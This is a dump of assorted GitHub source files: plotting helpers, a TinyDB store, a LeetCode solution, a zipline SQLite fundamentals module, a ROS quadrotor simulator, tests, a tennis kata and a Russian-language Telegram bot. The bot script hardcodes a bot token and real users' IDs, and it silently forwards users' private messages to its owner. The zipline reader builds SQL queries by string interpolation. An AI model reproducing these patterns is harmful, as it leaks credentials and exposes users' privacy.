parameters['runConfigs']['GateSweep']['gateVoltageRamps']\n\t\n\tdrains = parameters['runConfigs']['AutoGateSweep']['drainVoltageSetPoints'] if(len(parameters['runConfigs']['AutoGateSweep']['drainVoltageSetPoints']) > 0) else [parameters['runConfigs']['GateSweep']['drainVoltageSetPoint']]\n\t\n\t# Plot Constant Drain Voltage\n\tfor i,drain in enumerate(drains):\n\t\tfor j in range(parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']):\n\t\t\tline = plotSweepParameters(ax, colors[0], drain, drain, points, duplicates, ramps, time_offset=i*parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']+j)\n\tsetLabel(line, plotDescription['plotDefaults']['legend_labels'][0])\n\t\n\t# Plot Sweeping Gate Voltage\n\tfor i in range(len(drains)*parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']):\n\t\tline = plotSweepParameters(ax, colors[1], start, end, points, duplicates, ramps, time_offset=i)\n\tsetLabel(line, plotDescription['plotDefaults']['legend_labels'][1])\n\n\tax.set_title('Gate Sweep Voltage Waveform')\n\tax.set_yticks([0] + [start, end] + drains)\n\tax.legend(loc='best', title=\"Sweeps: {:}\".format(len(drains)*parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']))\n\n\treturn (fig, (ax,))\n","repo_name":"stevennoyce/AutexysHost","sub_path":"source/utilities/PlotDefinitions/Parameters/Parameters_AutoGateSweep.py","file_name":"Parameters_AutoGateSweep.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"3828982838","text":"import logging\nlog = logging.getLogger(__name__)\nfrom inspect import currentframe\nfrom sys import exit as exits\n\nfrom tinydb import TinyDB, Query\n\nfrom . import Course\n\ndef get_all_courses():\n log.info(currentframe().f_code.co_name)\n course_dicts = course_table().all()\n return [Course(**course_dict) for course_dict in course_dicts]\n\ndef get_course(label):\n log.info(currentframe().f_code.co_name)\n course_dicts = course_table().search(Query().label == label)\n if not course_dicts:\n return None\n course_dict = course_dicts[0]\n log.info(\"Retrieved record {}\".format(course_dict))\n return Course(**(course_dict)) \n\ndef add_course(label, course):\n log.info(currentframe().f_code.co_name)\n if get_course(label):\n log.error(\"Will not replace existing course for label: \"+label)\n exits(1)\n ensure_fewer_than(Query().name_in_fs == course.name_in_fs, 1,\n \"Attempting to add another course with name {}\"\\\n .format(course.name_in_fs))\n dict_repr = course.dumpd()\n dict_repr[\"label\"] = label\n course_table().insert(dict_repr)\n\ndef replace_course(label, new_course):\n log.info(currentframe().f_code.co_name)\n query = Query().label == label\n ensure_fewer_than(query, 2,\n \"Replacing course for label {} but already too many!\"\\\n .format(label))\n course_table().remove(query)\n add_course(label, new_course)\n\ndef update_course_files(course):\n log.info(currentframe().f_code.co_name)\n query = Query().name_in_fs == course.name_in_fs\n ensure_fewer_than(query, 2, \"Name collision found in course table!\")\n course_dict = course.dumpd()\n course_table().update(\n \t{\n \t 'children' : course_dict[\"children\"],\n \t 'iso_date_str' : course_dict[\"iso_date_str\"],\n \t 'size_bytes' : course_dict[\"size_bytes\"]\n \t},\n \tquery)\n\n##\n### Labels to Ignore ###################################################\n##\ndef get_ignore_list():\n log.info(currentframe().f_code.co_name)\n return [entry[\"label\"] for entry in db().table('ignored')]\n\ndef ignore(label):\n log.info(currentframe().f_code.co_name)\n db().table('ignored').insert({'label': label})\n\n##\n### Wrapping TinyDB ###################################################\n##\ncourse_db = None\ndef db():\n global course_db\n if course_db == None:\n log.info(\"opening tinydb database\")\n course_db = TinyDB('course_db.json', indent=4)\n return course_db\n\ndef course_table():\n return db().table('courses')\n\ndef ensure_fewer_than(query, count, err_msg=None):\n if course_table().count(query) >= count:\n if err_msg == None:\n err_msg = \"Not fewer than {} for {}\".format(count, query)\n log.error(err_msg)\n exits(1)\n\n","repo_name":"roselandgoose/course-file-downloader","sub_path":"source/canvas/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"487704253","text":"from functools import lru_cache\nfrom typing import List\n\nclass Solution:\n def maximumANDSum(self, nums: List[int], numSlots: int) -> int:\n n = len(nums)\n @lru_cache(None)\n def dfs(idx, mask):\n if idx == n:\n return 0\n ans = 0\n for i in range(numSlots):\n if (mask // 3** i) % 3 > 0:\n ans = max(ans, dfs(idx + 1, mask - 3 ** i) + (nums[idx] & (i + 1))) \n \n return ans\n \n init = 3** numSlots - 1\n return dfs(0, init)\n ","repo_name":"cosmicshuai/LeetCode_Practice","sub_path":"DP/2172. Maximum AND Sum of Array.py","file_name":"2172. Maximum AND Sum of Array.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15087464049","text":"from zipline.utils.input_validation import preprocess\nfrom zipline.utils.sqlite_utils import coerce_string_to_conn\nimport sqlite3\nimport six\nimport os\nimport errno\nimport numpy as np\nfrom numpy import integer as any_integer\n\nimport pandas as pd\nfrom zipline.utils.numpy_utils import (\n datetime64ns_dtype,\n float64_dtype,\n object_dtype,\n int64_dtype,\n bool_dtype,\n uint32_dtype,\n uint64_dtype,\n dtype,\n)\n\nSQLITE_FUNDAMENTALS_COLUMN_DTYPES = {\n 'sid': any_integer,\n 'ann_date': datetime64ns_dtype,\n 'f_ann_date': datetime64ns_dtype,\n 'end_date': object_dtype,\n 'report_type': float64_dtype,\n 'comp_type': float64_dtype,\n 'update_flag': object_dtype,\n 'total_share': float64_dtype,\n 'cap_rese': float64_dtype,\n}\n\nSQLITE_FUNDAMENTAL_FACTORS_COLUMN_DTYPES = {\n 'sid': any_integer,\n 'date': datetime64ns_dtype,\n 'value': float64_dtype,\n}\n\nSQLITE_FACTORS_VALUE_DTYPES = {\n int64_dtype,\n datetime64ns_dtype,\n bool_dtype,\n float64_dtype,\n object_dtype,\n}\n\n\nclass SQLiteFundamentalsWriter(object):\n \"\"\"\n Writer for data to be read by SQLiteFundamentalsReader\n\n Parameters\n ----------\n conn_or_path : str or sqlite3.Connection\n A handle to the target sqlite database.\n overwrite : bool, optional, default=False\n If True and conn_or_path is a string, remove any existing files at the\n given path before connecting.\n\n See Also\n --------\n zipline.data.us_equity_pricing.SQLiteFundamentalsReader\n \"\"\"\n\n def __init__(self, conn_or_path, overwrite=False):\n if isinstance(conn_or_path, sqlite3.Connection):\n self.conn = conn_or_path\n elif isinstance(conn_or_path, six.string_types):\n if overwrite:\n try:\n os.remove(conn_or_path)\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n self.conn = sqlite3.connect(conn_or_path)\n self.uri = conn_or_path\n else:\n raise TypeError(\"Unknown connection type %s\" % type(conn_or_path))\n\n def write_factor(self, table=None, name=None):\n\n if table is None:\n return\n\n # df = table[fundamentals['name'] == name].copy()\n # df.drop('name', axis=1, inplace=True)\n table['date'] = table['date'].values.astype('datetime64[s]').astype(any_integer)\n\n if dtype(table['value']) in SQLITE_FACTORS_VALUE_DTYPES:\n table.to_sql(\n 'fundamentals_%s' % name,\n self.conn,\n if_exists='append',\n chunksize=50000,\n )\n else:\n raise ValueError(\n \"Unexpected frame columns:\\n\"\n \"Expected Columns: %s\\n\"\n \"Received Columns: %s\" % (\n set(SQLITE_FACTORS_VALUE_DTYPES),\n dtype(table['value']),\n )\n )\n\n def write(self, fundamentals=None):\n \"\"\"\n Writes data to a SQLite file to be read by SQLiteFundamentalsReader.\n\n Parameters\n ----------\n fundamentals : pandas.DataFrame, optional\n Dataframe containing fundamentals data. The format of this dataframe is:\n sid : int\n The asset id associated with this fundamentals.\n date : datetime64\n The date of the fundamental data\n name : string\n A name of the fundamental\n value : float\n A value of the fundamental\n \"\"\"\n if fundamentals is None:\n return\n\n for name in fundamentals['name'].unique():\n df = fundamentals[fundamentals['name'] == name].copy()\n df.drop('name', axis=1, inplace=True)\n df['date'] = df['date'].values.astype('datetime64[s]').astype(any_integer)\n self._write(\n 'fundamentals_%s' % name,\n SQLITE_FUNDAMENTAL_FACTORS_COLUMN_DTYPES,\n df,\n )\n\n def write_fundamentals(self, fundamentals):\n self._write(\n 'fundamentals',\n SQLITE_FUNDAMENTALS_COLUMN_DTYPES,\n fundamentals,\n )\n\n def _write(self, tablename, expected_dtypes, frame):\n if frame is None or frame.empty:\n # keeping the dtypes correct for empty frames is not easy\n frame = pd.DataFrame(\n np.array([], dtype=list(expected_dtypes.items())),\n )\n else:\n if frozenset(frame.columns) != frozenset(six.viewkeys(expected_dtypes)):\n raise ValueError(\n \"Unexpected frame columns:\\n\"\n \"Expected Columns: %s\\n\"\n \"Received Columns: %s\" % (\n set(expected_dtypes),\n frame.columns.tolist(),\n )\n )\n\n actual_dtypes = frame.dtypes\n for colname, expected in six.iteritems(expected_dtypes):\n actual = actual_dtypes[colname]\n if not np.issubdtype(actual, expected):\n raise TypeError(\n \"Expected data of type {expected} for column\"\n \" '{colname}', but got '{actual}'.\".format(\n expected=expected,\n colname=colname,\n actual=actual,\n ),\n )\n\n frame.to_sql(\n tablename,\n self.conn,\n if_exists='append',\n chunksize=50000,\n )\n\n def __enter__(self):\n return self\n\n def __exit__(self, *exc_info):\n self.close()\n\n def close(self):\n self.conn.close()\n\n\nclass SQLiteFundamentalsReader(object):\n \"\"\"\n Loads fundamentals from a SQLite database.\n\n Expects data written in the format output by `SQLiteFundamentalsWriter`.\n\n Parameters\n ----------\n conn : str or sqlite3.Connection\n Connection from which to load data.\n\n See Also\n --------\n :class:`zipline.data.fundamentals.SQLiteFundamentalsWriter`\n \"\"\"\n\n @preprocess(conn=coerce_string_to_conn(require_exists=True))\n def __init__(self, conn):\n self.conn = conn\n\n def read(self, name, dates, assets):\n\n start_dt64 = dates[0].to_datetime64().astype(any_integer) / 1000000000\n end_dt64 = dates[-1].to_datetime64().astype(any_integer) / 1000000000\n\n sql = 'SELECT sid, value, date FROM fundamentals_%s WHERE date < %s ORDER BY date' % (name, end_dt64)\n\n df = pd.read_sql_query(\n sql,\n self.conn,\n # index_col=['trading_date', 'code'],\n # parse_dates=['date'],\n # chunksize=500,\n )\n result = pd.DataFrame(index=dates, columns=assets)\n\n for asset in assets:\n df_sid = df[df['sid'] == asset].copy()\n\n # set start_date\n st_df = df_sid[df_sid['date'] < start_dt64]['date']\n start_date = st_df.iloc[-1] if st_df.any() else start_dt64\n\n df_sid = df_sid[df_sid['date'] >= start_date]\n if start_date < start_dt64:\n result[asset].loc[dates[0]] = df_sid['value'].iloc[0]\n\n for row in df_sid.iterrows():\n date, value = int(row[1]['date']), row[1]['value']\n if date >= end_dt64:\n break\n dtime = np.datetime64(date, 's')\n if dtime in result.index:\n result[asset].loc[dtime] = value\n\n return result.fillna(method='ffill')\n\n def read_fundamentals(self, names, dates, assets):\n name = names[0]\n\n start_date = dates[0].to_datetime()\n end_date = dates[-1].to_datetime()\n\n sql = '''SELECT sid, f_ann_date, end_date, %s From fundamentals''' % name\n\n df = pd.read_sql_query(\n sql,\n self.conn,\n # index_col=['trading_date', 'code'],\n parse_dates=['f_ann_date'],\n # chunksize=500,\n )\n\n df = df.sort_values(by=\"f_ann_date\", ascending=True)\n\n result = pd.DataFrame(index=dates, columns=assets)\n\n for asset in assets:\n df_sid = df[df['sid'] == asset].copy()\n\n # set start_date\n st_df = df_sid[df_sid['f_ann_date'] < start_date]['f_ann_date']\n st_date = st_df.iloc[-1] if st_df.any() else start_date\n\n df_sid = df_sid[df_sid['f_ann_date'] >= st_date]\n st_date = st_date.tz_localize('utc')\n if st_date < start_date:\n result[asset].loc[dates[0]] = df_sid[name].iloc[0]\n\n for row in df_sid.iterrows():\n date, value = row[1]['f_ann_date'], row[1][name]\n date = date.tz_localize('utc')\n if date >= end_date:\n break\n dtime = np.datetime64(date, 's')\n if dtime in result.index:\n result[asset].loc[dtime] = value\n\n return result.fillna(method='ffill')\n","repo_name":"wmding/zipline-extensions-cn","sub_path":"zipline_extensions_cn/data/fundamentals.py","file_name":"fundamentals.py","file_ext":"py","file_size_in_byte":9096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"9901951128","text":"import sys\n\n\nclass StreamData:\n def create(self, fields, lst_values):\n if len(fields) != len(lst_values):\n return False\n\n for i, key in enumerate(fields):\n setattr(self, key, lst_values[i])\n\n return True\n\n\nclass StreamReader:\n FIELDS = (\"id\", \"title\", \"pages\")\n\n def readlines(self):\n lst_in = list(\n map(str.strip, sys.stdin.readlines())\n ) # schityvanije spiska strok iz vhodnogo potoka\n sd = StreamData()\n res = sd.create(self.FIELDS, lst_in)\n return sd, res\n\n\nsr = StreamReader()\ndata, result = sr.readlines()\n","repo_name":"olegarslanov/PTUA3","sub_path":"Exercises/OOP_exercises/Dobryj_dobryj_python_OOP_obuchajushij_kurs_ot_Sergeja_Balakirieva/podvig7.py","file_name":"podvig7.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71582372723","text":"# Vaishnavi Gopalakrishnan\nfrom gedcom.validate import validator\n\n\n@validator\ndef validate_birth_after_divorce(individuals, families):\n \"\"\" US09 - Birth should occur before the parents divorce \"\"\"\n for individual in individuals:\n if individual.child_to:\n for family in families:\n if family.id in individual.child_to:\n if family.divorce and family.divorce < individual.birthdate:\n print('Individual {} born after divorce in family {}.'\n .format(individual.id, family.id))\n return False\n return True\n","repo_name":"das-sein/ssw555-gedcom","sub_path":"gedcom/validate/birth_after_divorce.py","file_name":"birth_after_divorce.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"4640426720","text":"#! /usr/bin/env python\n\nimport rospy\nimport numpy as np\nfrom dynamics import DynamicsQuadrotorModified\nfrom nav_msgs.msg import Odometry\nfrom clbfet.msg import hjlcon\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass sim_odom():\n def __init__(self):\n self.m = 35.89/1000\n self.x_log = np.zeros((6,500-1))\n self.x = np.array([[0.0],[0.0],[0.0],[0.0],[0.0],[0.0]])\n self.x_log[:,0:1] = self.x\n self.iters = 0\n self.current_time = rospy.get_rostime()\n self.last_time = self.current_time\n self.last_acc = np.zeros((3,1))\n self.true_dyn = DynamicsQuadrotorModified(disturbance_scale_pos = 0.0, disturbance_scale_vel = -1.0, control_input_scale = 1.0)\n rospy.Subscriber('hjl_con', hjlcon, self.con_cb)\n self.odom_pub = rospy.Publisher('odom', Odometry, queue_size = 10)\n self.timer = rospy.Timer(rospy.Duration(1/250.0), self.timer_cb)\n self.end = False\n\n def con_cb(self, con):\n print ('control time: ', (rospy.get_rostime() - self.last_send_odom_time).to_sec())\n if self.end:\n return\n # rospy.loginfo('receive control')\n control = np.array([con.thrust, con.roll, con.pitch, con.yaw])\n self.last_acc = self.convert_control_to_mu(control).reshape((3,1))\n # print 'receive acc:', self.last_acc.T\n\n\n self.current_time = rospy.get_rostime()\n dt = (self.current_time - self.last_time).to_sec()\n dt = 0.02\n print ('dt', dt)\n next_x = self.true_dyn.step(self.x, self.last_acc, dt)\n print (' with acc=', self.last_acc.T, ' after ', dt)\n print (' to ', next_x.T)\n print ('--------------------------------------------------------')\n self.x = next_x\n self.last_time = self.current_time\n self.x_log[:,self.iters+1:self.iters+2] = self.x\n self.iters += 1\n\n if con.end:\n self.timer.shutdown()\n print ('x_log.shape', self.x_log.shape)\n self.savefig()\n self.end = True\n \n def timer_cb(self, _event):\n # self.current_time = rospy.get_rostime()\n # dt = (self.current_time - self.last_time).to_sec()\n # # dt = 0.02\n # print 'dt', dt\n # next_x = self.true_dyn.step(self.x, self.last_acc, dt)\n # print ' with acc=', self.last_acc.T, ' after ', dt\n # print ' to ', next_x.T\n # print '--------------------------------------------------------'\n # self.x = next_x\n # self.last_time = self.current_time\n # self.x_log[:,self.iters+1:self.iters+2] = self.x\n # self.iters += 1\n\n odom = Odometry()\n odom.header.stamp = rospy.get_rostime()\n odom.header.frame_id = 'odom'\n odom.pose.pose.position.x = self.x[0,0]\n odom.pose.pose.position.y = self.x[1,0]\n odom.pose.pose.position.z = self.x[2,0]\n odom.twist.twist.linear.x = self.x[3,0]\n odom.twist.twist.linear.y = self.x[4,0]\n odom.twist.twist.linear.z = self.x[5,0]\n # print 'sending pos', self.x.T\n self.last_send_odom_time = rospy.get_rostime()\n self.odom_pub.publish(odom)\n \n def convert_control_to_mu(self, control):\n thrust = control[0]\n phi = control[1]\n theta = control[2]\n psi = control[3]\n ax = thrust * (np.cos(phi) * np.sin(theta) * np.cos(psi) + np.sin(phi) * np.sin(psi)) / self.m\n ay = thrust * (np.cos(phi) * np.sin(theta) * np.sin(psi) - np.sin(phi) * np.cos(psi)) / self.m\n az = thrust * (np.cos(phi) * np.cos(theta)) / self.m\n return np.array([ax, ay, az])\n\n def savefig(self):\n self.x = np.array(self.x)\n fig = plt.figure()\n plt.rcParams.update({'font.size': 12})\n plt.rcParams['axes.unicode_minus'] = False\n ax = plt.axes(projection='3d')\n ax.plot3D(self.x_log[0,:], self.x_log[1,:], self.x_log[2,:], 'g-',alpha=0.9,label='traj')\n ax = fig.gca()\n plt.savefig('odom.png', dpi=600, format='png',bbox_inches='tight')\n rospy.loginfo('fig saved.')\n\nif __name__ == '__main__':\n try:\n rospy.init_node(\"sim_odom_node\")\n simple_odom = sim_odom()\n rospy.loginfo(\"sim_odom_node is starting...\")\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down sim_odom node.\")\n","repo_name":"leaffffff/CLBFET","sub_path":"src/sim_odom_node.py","file_name":"sim_odom_node.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37299254111","text":"#!/usr/bin/env python\nimport json\n\n\ndef _load_coeffs(filename):\n with open(filename, encoding=\"utf-8\") as f:\n return json.load(f)\n\n\ndef _evaluate(coeffs, x):\n return coeffs[\"a\"] * x**2 + coeffs[\"b\"] * x + coeffs[\"c\"]\n\n\nif __name__ == \"__main__\":\n coeffs = _load_coeffs(\"coeffs.json\")\n output = [_evaluate(coeffs, x) for x in range(10)]\n with open(\"poly.out\", \"w\", encoding=\"utf-8\") as f:\n f.write(\"\\n\".join(map(str, output)))\n","repo_name":"equinor/ert","sub_path":"test-data/poly_example/poly_eval.py","file_name":"poly_eval.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"75"} +{"seq_id":"39806417504","text":"#!/usr/bin/env python\nimport irpy\n\nclass BigTree(object):\n \"\"\"\n a0 --> b0 --> c0 --> d0\n | | |\n | | --> d1\n | --> c1\n --> b1\n \"\"\"\n @irpy.lazy_property_leaves(immutables=[\"c1\",\"d1\"], mutables=[\"b1\",\"d0\"])\n def __init__(self):\n self.b1 = set([\"b1\"])\n self.c1 = set([\"c1\"])\n self.d1 = set([\"d1\"])\n self.d0 = set([\"d0\"])\n \n @irpy.lazy_property_mutable\n def c0(self):\n return set([\"c0\"]) | self.d0 | self.d1\n\n @irpy.lazy_property_mutable\n def b0(self):\n return set([\"b0\"]) | self.c0 | self.c1\n\n @property\n def b0_vlp(self):\n \"Vanilla lazy_property\"\n try:\n v = self._b0_vlp\n except AttributeError:\n v = set([\"b0\"]) | self.c0 | self.c1\n self._b0_vlp = v\n\n return v\n\n @irpy.lazy_property\n def a0(self):\n return set([\"a0\"]) | self.b0 | self.b1\n\n\nimport unittest\n\nclass TestBigTree(unittest.TestCase):\n\n def setUp(self):\n self.f = BigTree()\n \n def test_immutability(self):\n try:\n self.f.d1 = set(\"d1_set\")\n except AttributeError:\n return True\n else:\n raise AttributeError(\"This node is immutable!\")\n\n def test_dynamic(self):\n \"\"\"\n a0 --> b0 --> c0 --> d0\n | | |\n | | --> d1\n | --> c1\n --> b1\n \"\"\"\n self.assertEqual(self.f.a0, set(['a0', 'b0', 'b1', 'c1', 'c0', 'd0', 'd1']))\n\n #Create a new leaf\n self.f.b0 = set([\"b0_set\"])\n \"\"\"\n a0 --> b0_set || c0 --> d0\n | || | \n --> b1 || --> d1\n \"\"\"\n self.assertEqual(self.f.a0, set(['a0', 'b0_set', 'b1']))\n self.assertEqual(self.f.c0, set(['c0', 'd0', 'd1']))\n\n #Check if the tree are well separated; aka no filiation relicat\n self.f.b1 = set(['b1_set'])\n self.f.d0 = set(['d0_set'])\n \"\"\"\n a0 --> b0_set || c0 --> d0_set\n | || | \n --> b1_set || --> d1\n \"\"\"\n self.assertEqual(self.f.a0, set(['a0', 'b0_set', 'b1_set']))\n self.assertEqual(self.f.c0, set(['c0', 'd0_set', 'd1']))\n\n def test_performance_cache(self):\n \"\"\"Compare the naive vanilla python lazy property\n (where property is written in C in the python stdlib)\n with our IRP lazy_property with the genealogy overhead\n \n Python 2.*: 1.25x Python 3.*: 1.75x\n \"\"\"\n import timeit\n\n i = timeit.timeit('f.b0;', setup='from __main__ import BigTree; f = BigTree()', number=5000000)\n h = timeit.timeit('f.b0_vlp;', setup='from __main__ import BigTree; f = BigTree()', number=5000000)\n\n try:\n self.assertTrue(i < h*1.75)\n except AssertionError as e:\n raise e\n\nif __name__ == '__main__':\n\n import unittest\n unittest.main()\n","repo_name":"TApplencourt/IRPy","sub_path":"run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"34785085887","text":"import telebot\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom telebot import types\nfrom random import randint\n\ntoken = '5082755438:AAGhr6Xy_hHVafJmFDFJSiZ6KxWcXiMg4yQ'\nbot = telebot.TeleBot(token)\nmyid = 987747961\nt = datetime.now() + timedelta(hours=3)\n\n\n@bot.message_handler(commands=['start'])\ndef welcome(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n item1 = types.KeyboardButton(\"Сегодня\")\n item2 = types.KeyboardButton(\"Завтра\")\n markup.add(item1, item2)\n bot.send_message(message.chat.id,\n \"Хей, {0.first_name}!\\nЯ был ботом по рассылки расписания, но меня уволили, все из-за этого \\\n сранного сайта с расписаниями, видете ли он такой удобный, работает без перебоев, Асану было \\\n вообще наплевать, но я же н�� просто бот с расписанием...\".format(\n message.from_user),\n parse_mode='html', reply_markup=markup)\n\n\nusers_name = ['Я', 'Юра', 'Витя', 'Наташа', 'Андрей', 'Вова', 'Саня', 'Кристина', 'Полина', 'Мурад', 'Женя', 'Рустем',\n 'Серега']\nusers_id = [987747961, 1104366725, 1392399775, 1759968026, 541259320, 1289039138, 1781110107, 433731618, 1360741124,\n 1360613411, 5134261433, 1971574147, 1437586611]\nprepods = [['Широков', 'Игорь', 'Борисович'],\n ['Кудрявченко', 'Иван', 'Владимирович'],\n ['Макаров', 'Виктор', 'Константинович'],\n ['Деордица', 'Сергей', 'Витальевич'],\n ['Ломоносов', 'Сергей', 'Евгеньевич'],\n ['Мурзин', 'Дмитрий', 'Геннадьевич'],\n ['Еремина', 'Юлия', 'Юрьевна'],\n ['Зубенко', 'Наталья', 'Викторовна'],\n ['Корж', 'Елена', 'Николаевна']]\nmats = ['хуй', \"Хуй\", 'Еблан', 'идорас', 'андон', 'Сука', 'ебок', 'ебище', 'ебал', 'Пидор', 'лять', \"лядь\", \"еблан\"]\nnamat = ['Сам', \"токсик\", \"Кто как обзывается, тот сам так называется\",\n 'Не забывай, я имею доступ к данным твоего телефона)', \"Мне же обидно 😖\", \"Ясно, бан\",\n 'Скажи это мне в жизни, интернет герой', 'Я вижу плохие слова в твоем сообщении']\nnoans = ['Не понял', 'Сори, не понял, Асану лень прописать мне ответы', 'Прости, что?',\n 'Я хз что ответить', 'Ты расписание уже посмотрел?', 'ага, да, я все понял', 'че?', 'ладно',\n 'Error, your phone reboot after 5 sec', 'Не может быть', 'Не верю', '?%%;(*%(*\"3646 err', 'Ты это мне?',\n 'Честно?', 'Скажи мне это в жизни, интернет герой', 'Чтобы это не значило, я за Путина', 'Хочешь анектод?',\n 'Хм', '...', 'Помоги мне, Асан взял меня в плен и заставляет отвечать на ваши сообщения от лица бота',\n 'Я устал вам отвечать', 'Это не входит в список моих команд']\nques = ['Нет наверное', 'Думаю да', 'Хз', 'Я че гУгЛ, вопросы мне задаешь)', 'угу', 'не уверен']\nweekdays = ['онедельник', 'торник', 'реда', 'етверг', 'ятница', 'уббота', 'оскресенье']\n\n\ndef search(spis, mes):\n for i in spis:\n if i in mes:\n return True\n\n\ndef norasp(chatid):\n ans = ['Я больше не знаю расписание, Асан урезал мои возможности',\n 'У меня больше нет данных о раписании, Асан дал предпочтение бездушному сайту...',\n 'Прости, я больше не знаю расписание, мой функционал теперь ограничен',\n 'Я не знаю что в этот день, Асан ограничел мне доступ, отдав приимущество дешевому сайту с расписанием...',\n 'Я больше не знаю распиание...',\n 'У меня больше нет расписания, мой функционал теперь ограничен...',\n 'Я больше не могу рассылать расписание, Асан решил что дерьмосайт с расписанием лучше чем я',\n 'Прости, у меня больше нет расписания']\n bot.send_message(chatid, ans[randint(0, len(ans)-1)])\n\n\ndef answer(mes, message):\n time = datetime.now() + timedelta(hours=3)\n r = randint(0, 2)\n for x in prepods:\n for y in range(3):\n if mes == x[y]:\n bot.send_message(message.chat.id, \" \".join(x))\n return\n if search(mats, mes):\n if r == 0:\n pic = open(f'static/mat/{randint(0, 10)}.webp', 'rb')\n bot.send_sticker(message.chat.id, pic)\n return\n else:\n ans = namat[randint(0, len(namat) - 1)]\n elif 'Давай' in mes or 'давай' in mes:\n ans = \"Жена давать будет)\"\n elif mes == \"шоколадно\" or mes == \"Шоколадно\":\n ans = \"Ээ, это моя фишка\"\n elif mes == 'Ладно' or mes == 'ладно':\n ans = \"Шоколадно)\"\n elif mes == 'Да' or mes == 'да':\n ans = \"Пизда)\"\n elif mes == 'Нет' or mes == 'нет':\n ans = \"Пидора ответ)\"\n elif 'урак' in mes or 'ибил' in mes:\n ans = \"Сам\"\n elif 'ак тебя зовут' in mes or 'Кто ты' in mes:\n ans = \"Я - гуль\"\n elif 'атары' in mes or 'атарин' in mes:\n ans = 'ТАТАРЫ СИЛА'\n elif 'звини' in mes:\n vid = open('static/sorry.mp4', 'rb')\n bot.send_video(message.chat.id, vid)\n return\n elif mes == \"Хочу\" or mes == \"хочу\":\n ans = 'хоти'\n elif 'ривет' in mes or 'дарова' in mes or 'драствуй' in mes:\n ans = 'Привет'\n elif 'салам' in mes or 'Салам' in mes:\n ans = 'Алейкум, брат'\n elif 'е как' in mes or 'ак сам' in mes or 'ак дела' in mes:\n ans = 'Та норм, сам как?'\n elif 'делаешь' in mes:\n ans = 'Чай пью, что я еще могу делать'\n elif 'то делать' in mes:\n ans = 'Муравью хуй приделать'\n elif 'пасиб' in mes or 'лагодарю' in mes or 'агъ ол' in mes:\n ans = 'Обращайся)'\n elif mes == 'Дата':\n ans = f'Сервак: {datetime.now()} Русс: {time}'\n elif 'Пока' in mes or 'пока' in mes:\n ans = 'Пока, если что пиши)'\n elif '?' in mes:\n ans = ques[randint(0, len(ques) - 1)]\n else:\n '''\n for i in range(len(weekdays)):\n if weekdays[i] in mes:\n norasp(message.chat.id)\n '''\n if r == 0:\n pic = open(f'static/noans/{randint(0, 5)}.webp', 'rb')\n bot.send_sticker(message.chat.id, pic)\n return\n ans = noans[randint(0, len(noans) - 1)]\n bot.send_message(message.chat.id, ans)\n return\n\n\n@bot.message_handler(content_types=['text'])\ndef group(message):\n if message.chat.type == 'private':\n if message.chat.id == myid:\n if message.text[:5] == \"#all \":\n for i in users_id:\n bot.send_message(i, message.text[5:])\n bot.send_message(myid, \"Отправил всем\")\n return\n elif message.text[0] == '!':\n id_name = message.text[1:message.text.find(\" \")]\n text = message.text[message.text.find(' ') + 1:]\n for i in range(len(users_id)):\n if users_name[i] == id_name:\n bot.send_message(users_id[i], text)\n bot.send_message(myid, f\"Отправил {id_name}\")\n return\n elif message.text[:7] == \"#video \":\n for i in users_id:\n vid = open(f'static/{message.text[7:]}.mp4', 'rb')\n bot.send_video(i, vid)\n bot.send_message(myid, \"Отправил видео всем\")\n return\n if 'егодня' in message.text or 'автра' in message.text:\n norasp(message.chat.id)\n else:\n answer(message.text, message)\n if message.chat.id != myid:\n bot.send_message(myid, f'{message.chat.first_name} пишет \"{message.text}\"')\n if message.chat.id not in users_id:\n bot.send_message(myid, f'Новый юзер {message.chat.first_name}, id {message.chat.id}')\n\n\ndef main():\n bot.polling(none_stop=True, interval=0, timeout=10)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nasan4ik228/Projects","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":9657,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27203538781","text":"class TennisGame:\n def __init__(self, player1_name, player2_name):\n self.player1_name = player1_name\n self.player2_name = player2_name\n self.player1_score = 0\n self.player2_score = 0\n self.point_term = {0:\"Love\",1:\"Fifteen\",2:\"Thirty\",3:\"Forty\"}\n\n def won_point(self, player_name):\n if player_name == \"player1\":\n self.player1_score = self.player1_score + 1\n else:\n self.player2_score = self.player2_score + 1\n\n def get_score(self):\n if self.player1_score == self.player2_score:\n #if equal on points\n if self.player1_score in self.point_term:\n return self.point_term[self.player1_score] + \"-All\"\n else:\n return \"Deuce\"\n elif self.player1_score >= 4 or self.player2_score >= 4:\n #if either player could have won or is in a position to win\n return self.score_difference(self.player1_score,self.player2_score) \n else:\n #normal play\n return self.point_term[self.player1_score] + 